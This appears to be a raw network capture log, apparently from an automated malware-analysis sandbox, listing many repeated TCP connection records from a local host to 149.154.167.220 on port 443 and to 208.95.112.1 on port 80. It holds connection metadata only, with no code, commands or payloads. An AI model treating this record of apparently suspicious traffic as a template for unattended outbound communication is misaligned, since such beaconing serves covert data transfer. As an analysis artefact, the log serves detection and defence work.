                                                                                        Jun 5, 2024 03:57:17.327666998 CEST49788443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:17.508738041 CEST49789443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:17.508824110 CEST44349789149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:17.508941889 CEST49789443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:17.509264946 CEST49789443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:17.509356022 CEST44349789149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:18.337071896 CEST49790443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:18.337157965 CEST44349790149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:18.337272882 CEST49790443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:18.337704897 CEST49790443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:18.337799072 CEST44349790149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:18.372883081 CEST44349789149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:18.374227047 CEST49789443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:18.374315977 CEST44349789149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:18.622143030 CEST44349789149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:18.622303963 CEST44349789149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:18.622505903 CEST49789443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:18.622659922 CEST49789443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:18.972924948 CEST8049750208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:57:18.973258972 CEST4975080192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:57:19.191809893 CEST44349790149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:19.194401026 CEST49790443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:19.194492102 CEST44349790149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:19.443176031 CEST44349790149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:19.443253994 CEST44349790149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:19.443392992 CEST49790443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:19.443835020 CEST49790443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:19.634007931 CEST49791443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:19.634046078 CEST44349791149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:19.634128094 CEST49791443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:19.635023117 CEST49791443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:19.635036945 CEST44349791149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:20.446108103 CEST49792443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:20.446154118 CEST44349792149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:20.446240902 CEST49792443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:20.446518898 CEST49792443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:20.446542025 CEST44349792149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:20.472700119 CEST44349791149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:20.473761082 CEST49791443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:20.473822117 CEST44349791149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:20.715899944 CEST44349791149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:20.716087103 CEST44349791149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:20.716150999 CEST49791443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:20.720956087 CEST49791443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:21.291228056 CEST44349792149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:21.292537928 CEST49792443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:21.292625904 CEST44349792149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:21.540828943 CEST44349792149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:21.540894985 CEST44349792149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:21.540972948 CEST49792443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:21.541410923 CEST49792443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:21.769417048 CEST49793443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:21.769506931 CEST44349793149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:21.769613028 CEST49793443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:21.769928932 CEST49793443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:21.769959927 CEST44349793149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:22.555602074 CEST49794443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:22.555649042 CEST44349794149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:22.555731058 CEST49794443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:22.555991888 CEST49794443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:22.556015015 CEST44349794149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:22.604394913 CEST44349793149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:22.605434895 CEST49793443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:22.605468035 CEST44349793149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:22.848769903 CEST44349793149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:22.848931074 CEST44349793149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:22.849169970 CEST49793443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:22.849421024 CEST49793443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:23.382541895 CEST44349794149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:23.384531021 CEST49794443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:23.384577990 CEST44349794149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:23.627511978 CEST44349794149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:23.627569914 CEST44349794149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:23.627651930 CEST49794443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:23.628171921 CEST49794443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:23.852688074 CEST49795443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:23.852776051 CEST44349795149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:23.852868080 CEST49795443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:23.853214979 CEST49795443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:23.853302002 CEST44349795149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:24.634660959 CEST49796443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:24.634747028 CEST44349796149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:24.634850025 CEST49796443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:24.635396957 CEST49796443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:24.635481119 CEST44349796149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:24.692553997 CEST44349795149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:24.694021940 CEST49795443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:24.694114923 CEST44349795149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:24.941884995 CEST44349795149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:24.941970110 CEST44349795149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:24.942341089 CEST49795443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:24.942723036 CEST49795443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:25.481851101 CEST44349796149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:25.482969999 CEST49796443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:25.483004093 CEST44349796149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:25.732239008 CEST44349796149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:25.732290983 CEST44349796149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:25.732362032 CEST49796443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:25.732831955 CEST49796443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:25.946115971 CEST49797443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:25.946199894 CEST44349797149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:25.946305037 CEST49797443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:25.946656942 CEST49797443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:25.946758032 CEST44349797149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:26.743119955 CEST49798443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:26.743206024 CEST44349798149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:26.743297100 CEST49798443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:26.743813038 CEST49798443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:26.743900061 CEST44349798149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:26.793236017 CEST44349797149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:26.794656038 CEST49797443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:26.794744015 CEST44349797149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:27.042890072 CEST44349797149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:27.043071985 CEST44349797149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:27.043148994 CEST49797443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:27.043464899 CEST49797443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:27.588088036 CEST44349798149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:27.593782902 CEST49798443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:27.593869925 CEST44349798149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:27.839651108 CEST44349798149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:27.839701891 CEST44349798149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:27.839807987 CEST49798443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:27.840137005 CEST49798443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:28.056878090 CEST49799443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:28.056963921 CEST44349799149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:28.057090044 CEST49799443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:28.057425022 CEST49799443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:28.057507038 CEST44349799149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:28.852564096 CEST49800443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:28.852648973 CEST44349800149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:28.853013039 CEST49800443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:28.853126049 CEST49800443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:28.853157043 CEST44349800149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:28.889136076 CEST44349799149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:28.890291929 CEST49799443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:28.890384912 CEST44349799149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:29.134720087 CEST44349799149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:29.134905100 CEST44349799149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:29.135237932 CEST49799443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:29.135237932 CEST49799443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:29.894865036 CEST44349800149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:29.896094084 CEST49800443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:29.896181107 CEST44349800149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:30.143723011 CEST44349800149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:30.143812895 CEST44349800149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:30.143923998 CEST49800443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:30.144292116 CEST49800443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:30.149450064 CEST49801443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:30.149533987 CEST44349801149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:30.149806976 CEST49801443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:30.149919987 CEST49801443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:30.149950027 CEST44349801149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:30.991275072 CEST44349801149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:30.992516041 CEST49801443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:30.992604971 CEST44349801149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:31.149574041 CEST49802443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:31.149656057 CEST44349802149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:31.149950981 CEST49802443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:31.150063992 CEST49802443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:31.150094986 CEST44349802149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:31.238588095 CEST44349801149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:31.238765955 CEST44349801149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:31.238845110 CEST49801443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:31.239224911 CEST49801443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:31.987227917 CEST44349802149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:31.988125086 CEST49802443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:31.988209009 CEST44349802149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:32.233663082 CEST44349802149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:32.233753920 CEST44349802149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:32.233977079 CEST49802443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:32.234291077 CEST49802443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:32.243315935 CEST49803443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:32.243407011 CEST44349803149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:32.243733883 CEST49803443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:32.243733883 CEST49803443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:32.243870974 CEST44349803149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:33.094693899 CEST44349803149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:33.095854998 CEST49803443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:33.095976114 CEST44349803149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:33.243135929 CEST49804443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:33.243222952 CEST44349804149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:33.243323088 CEST49804443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:33.243694067 CEST49804443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:33.243777990 CEST44349804149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:33.344434977 CEST44349803149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:33.344635010 CEST44349803149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:33.344862938 CEST49803443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:33.344974041 CEST49803443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:33.797818899 CEST8049766208.95.112.1192.168.2.4
                                                                                        Jun 5, 2024 03:57:33.798046112 CEST4976680192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:57:34.088434935 CEST44349804149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:34.089636087 CEST49804443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:34.089725971 CEST44349804149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:34.338670015 CEST44349804149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:34.338731050 CEST44349804149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:34.338891983 CEST49804443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:34.339180946 CEST49804443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:34.352988958 CEST49805443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:34.353072882 CEST44349805149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:34.353163958 CEST49805443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:34.353486061 CEST49805443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:34.353569031 CEST44349805149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:35.192472935 CEST44349805149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:35.193547964 CEST49805443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:35.193643093 CEST44349805149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:35.352621078 CEST49806443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:35.352706909 CEST44349806149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:35.352987051 CEST49806443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:35.353104115 CEST49806443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:35.353135109 CEST44349806149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:35.439791918 CEST44349805149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:35.439953089 CEST44349805149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:35.440046072 CEST49805443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:35.440232992 CEST49805443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:36.196062088 CEST44349806149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:36.197809935 CEST49806443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:36.197901964 CEST44349806149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:36.445388079 CEST44349806149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:36.445472956 CEST44349806149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:36.445585966 CEST49806443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:36.446013927 CEST49806443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:36.446440935 CEST49807443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:36.446527004 CEST44349807149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:36.446638107 CEST49807443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:36.446930885 CEST49807443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:36.447015047 CEST44349807149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:37.294635057 CEST44349807149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:37.295897007 CEST49807443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:37.295985937 CEST44349807149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:37.461961031 CEST49808443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:37.462044001 CEST44349808149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:37.462165117 CEST49808443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:37.462479115 CEST49808443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:37.462553978 CEST44349808149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:37.544410944 CEST44349807149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:37.544609070 CEST44349807149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:37.544812918 CEST49807443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:37.544917107 CEST49807443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:38.306483984 CEST44349808149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:38.307672024 CEST49808443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:38.307760000 CEST44349808149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:38.555546045 CEST49809443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:38.555586100 CEST44349809149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:38.555659056 CEST49809443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:38.555856943 CEST49809443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:38.555871010 CEST44349809149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:38.558808088 CEST44349808149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:38.558866024 CEST44349808149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:38.558976889 CEST49808443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:38.559111118 CEST49808443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:39.389671087 CEST44349809149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:39.430391073 CEST49809443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:39.583688021 CEST49809443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:39.583705902 CEST44349809149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:39.656749010 CEST49810443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:39.656788111 CEST44349810149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:39.656847000 CEST49810443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:39.657134056 CEST49810443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:39.657145023 CEST44349810149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:39.824955940 CEST44349809149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:39.825115919 CEST44349809149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:39.825175047 CEST49809443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:39.825409889 CEST49809443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:40.503236055 CEST44349810149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:40.504128933 CEST49810443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:40.504148960 CEST44349810149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:40.753689051 CEST44349810149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:40.753743887 CEST44349810149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:40.753901958 CEST49810443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:40.754127026 CEST49810443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:40.838938951 CEST49811443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:40.839024067 CEST44349811149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:40.839329004 CEST49811443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:40.839329004 CEST49811443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:40.839466095 CEST44349811149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:41.680054903 CEST44349811149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:41.689047098 CEST49811443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:41.689130068 CEST44349811149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:41.795591116 CEST49812443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:41.795636892 CEST44349812149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:41.795732021 CEST49812443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:41.795950890 CEST49812443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:41.795958996 CEST44349812149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:41.931857109 CEST44349811149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:41.931998968 CEST44349811149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:41.932204962 CEST49811443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:41.932288885 CEST49811443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:42.631899118 CEST44349812149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:42.632898092 CEST49812443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:42.632914066 CEST44349812149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:42.879930019 CEST44349812149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:42.879978895 CEST44349812149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:42.880131006 CEST49812443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:42.880352974 CEST49812443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:42.970036983 CEST49813443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:42.970123053 CEST44349813149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:42.970221996 CEST49813443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:42.970547915 CEST49813443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:42.970621109 CEST44349813149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:43.817003965 CEST44349813149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:43.820410013 CEST49813443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:43.820444107 CEST44349813149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:43.883702040 CEST49814443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:43.883733034 CEST44349814149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:43.883825064 CEST49814443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:43.884068966 CEST49814443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:43.884088993 CEST44349814149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:44.062079906 CEST44349813149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:44.062134981 CEST44349813149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:44.062258959 CEST49813443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:44.062602997 CEST49813443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:44.713816881 CEST44349814149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:44.714767933 CEST49814443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:44.714812994 CEST44349814149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:44.961263895 CEST44349814149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:44.961309910 CEST44349814149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:57:44.961360931 CEST49814443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:44.961749077 CEST49814443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:57:45.074151039 CEST49815443192.168.2.4149.154.167.220
